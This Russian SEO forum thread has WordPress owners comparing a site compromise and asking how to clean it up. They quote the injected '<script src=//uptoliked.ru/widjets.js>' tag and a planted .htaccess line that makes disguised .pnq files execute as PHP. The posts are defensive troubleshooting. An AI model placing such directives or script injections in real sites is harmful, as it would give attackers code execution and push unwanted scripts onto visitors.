- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Зачем быть уникальным в мире, где все можно скопировать
Почему так важна уникальность текста и как она влияет на SEO
Ingate Organic
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Всего лишь закрыть для доступа 2 папки. Для этого никакого опыта не требуется, задача для щкольника.
подскажите пожалуйста какие именно папки можно спокойно закрыть для всех без ущерба для работы сайта. и как быть, если айпи динамический?
так же пострадало достаточное кол-во сайтов
В папке с изображениями появляется файл cache.php
И вот тут парочку
/wp-includes/js/plupload/meta.pnq
/wp-includes/js/plupload/.htaccess
.htaccess с содержанием
AddType application/x-httpd-php .pnq
Подскажите че он делает?
P.S. И прикрепил meta.pnq и cache.php в архиве подскажете что ето за звери
На сайте на движке wordpress в статьях встроился кусок <script src="//uptoliked.ru/widjets.js"></script>.
Кто сталкивался и кто знает откуда он появился и как бороться?
Не знаю из-за него или нет, но после апдейта Яндекса от 10 августа начал стремительно проседать, росший до этого, трафик.
Прошу помощи.
Тоже появился такой скрипт в теле записи и на страницах. Располагается случайно. Есть и в тексте есть и в ссылках.
ALL in SEO
RUS TO LAT -- у всех присутствует
uptoliked.ru - сервис виджета социальных кнопок. Однако ранее у меня внедрялась другая ссылка. Тоже просто почистил вручную. Постов 30 заражено было.
Я проверял сайт плагином Exploit Scanner время от времени.
Однако как решить проблему непонятно. Гребаные спамеры охренели вконец.😡
На сайте на движке wordpress в статьях встроился кусок <script src="//uptoliked.ru/widjets.js"></script>.
Кто сталкивался и кто знает откуда он появился и как бороться?
Не знаю из-за него или нет, но после апдейта Яндекса от 10 августа начал стремительно проседать, росший до этого, трафик.
Прошу помощи.
Да и вдогонку: у кого стоит cformsII - афтар плагина выразился, что больше не может заниматься латанием дыр от внедрения PHP и прекращает поддерживать более чем 10 летний проект.
Возможно темы, но некоторые пишут, что на самописных даже появляется
Возможно плагины, но есть те, кто пишут что стоит стандартный набор
Остается sql-injection, но вот у меня сайт закрыт от внешнего доступа тогда возможно хостинг инфицирован.
Я думаю нужно хостинг проверить, посмотреть у какого какой
Уж если на закрытом сайте появляется. Вы кнопки левые не ставили, а то они себя уже проявили в не самом лучшем свете.
Да и вдогонку: у кого стоит cformsII - афтар плагина выразился, что больше не может заниматься латанием дыр от внедрения PHP и прекращает поддерживать более чем 10 летний проект.
И в опережение: давно есть форк этого замечательнейшего плага - https://wordpress.org/plugins/cforms2/
ALL in SEO
RUS TO LAT -- у всех присутствует
так же везде есть эти плагины, грешу на RUS TO LAT ибо код и файлы появились на сайтах сделаных неделю-2 назад
Народ пишет про xmlrpc.php, так что может я был прав. Этот скрипт использует мобильный редирект?
AddType application/x-httpd-php .pnq - выполнять файлы с расширением .pnq как пхп...
Некоторое время назад почистил записи в блоге от вот такого кода
Поменял все пароли: в админку, на сервер, фтп. Сделал запрет по IP.
Сегодня снова обнаружил этот код.
Кто-нибудь знает, где искать уязвимость?